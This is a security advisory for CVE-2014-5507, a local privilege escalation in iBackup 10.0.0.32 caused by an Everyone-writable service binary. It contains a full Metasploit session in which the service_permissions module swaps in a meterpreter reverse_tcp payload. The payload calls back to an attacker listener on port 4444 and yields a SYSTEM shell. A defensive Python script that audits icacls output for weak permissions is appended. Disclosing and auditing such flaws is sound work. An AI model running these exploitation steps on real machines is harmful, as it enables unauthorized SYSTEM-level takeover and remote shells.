# Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation
# Date: 23/01/2014
# Author: Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>
# Version: 10.0.0.32
# Vendor: IBackup
# Vendor URL: https://www.ibackup.com/
# CVE-2014-5507

Vulnerability Details

The default IBackupWindows installation sets weak permissions on its service binary: Everyone is allowed to replace ib_service.exe with an executable of their choice. When the service restarts or the system reboots, the attacker's payload executes on the system with SYSTEM privileges.

C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe"
C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F)
                                               NT AUTHORITY\SYSTEM:(I)(F)
                                               BUILTIN\Administrators:(I)(F)
                                               BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\Users\0x414141>sc qc IBService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IBService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\IBackupWindows\ib_service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IBackup Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

msf exploit(service_permissions) > sessions

Active sessions
===============

  Id  Type                   Information                         Connection
  --  ----                   -----------                         ----------
  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)

msf exploit(service_permissions) > show options

Module options (exploit/windows/local/service_permissions):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AGGRESSIVE  true             no        Exploit as many services as possible (dangerous)
   SESSION     1                yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.0.100    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(service_permissions) > exploit

[*] Started reverse handler on 192.168.0.100:4444
[*] Meterpreter stager executable 15872 bytes long being uploaded..
[*] Trying to add a new service...
[*] No privs to create a service...
[*] Trying to find weak permissions in existing services..
[*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced.
[*] Restarting IBService
[*] Could not restart IBService. Wait for a reboot. (or force one yourself)

Upon Reboot or Service Restart

[*] Sending stage (770048 bytes) to 192.168.0.102
[*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > background
[*] Backgrounding session 2...

msf exploit(service_permissions) > sessions -l

Active sessions
===============

  Id  Type                   Information                         Connection
  --  ----                   -----------                         ----------
  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ 0x414141-PC   192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102)
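Added example, not part of the original advisory: a Python audit check that parses `sc qc` and `icacls` output like that shown above and reports ACEs that let a low-privileged principal rewrite a service binary. The function names, the `LOW_PRIV` principal list and the `WRITE_RIGHTS` set are assumptions of this example; the sample input is the command output from the advisory.

```python
import re

# Principals any local user holds (assumed list; extend for your environment).
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# icacls rights that allow replacing or rewriting the file.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WDAC", "WO", "D"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<flags>(?:\([^)]*\))+)$")

def service_binary(sc_qc_output):
    """Return (binary path, start account) from `sc qc` output."""
    path = re.search(r'BINARY_PATH_NAME\s*:\s*(?:"([^"]+)"|(\S+))', sc_qc_output)
    acct = re.search(r"SERVICE_START_NAME\s*:\s*(.+)", sc_qc_output)
    return (path.group(1) or path.group(2)), acct.group(1).strip()

def writable_aces(icacls_output, path):
    """Return [(principal, rights)] where a low-privileged principal can write."""
    findings = []
    for line in icacls_output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):  # first ACE follows the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # status lines and blanks
        tokens = {t.strip().upper() for grp in re.findall(r"\(([^)]*)\)", m["flags"])
                  for t in grp.split(",")}
        if "DENY" in tokens or "IO" in tokens:  # deny / inherit-only: no grant here
            continue
        hits = (tokens - INHERIT_FLAGS) & WRITE_RIGHTS
        if m["who"].strip().lower() in LOW_PRIV and hits:
            findings.append((m["who"].strip(), sorted(hits)))
    return findings

# Sample input: the command output shown in the advisory above.
SC_QC = r'''SERVICE_NAME: IBService
        BINARY_PATH_NAME   : "C:\Program Files\IBackupWindows\ib_service.exe"
        SERVICE_START_NAME : LocalSystem'''
ICACLS = r'''C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F)
                                               NT AUTHORITY\SYSTEM:(I)(F)
                                               BUILTIN\Administrators:(I)(F)
                                               BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files'''

if __name__ == "__main__":
    binary, account = service_binary(SC_QC)
    for who, rights in writable_aces(ICACLS, binary):
        print(f"{binary} (runs as {account}): {who} holds {rights}")
```

On the advisory's output this reports the inherited `Everyone:(I)(F)` ACE on a binary that runs as LocalSystem; an empty result is the expected state once that ACE is removed.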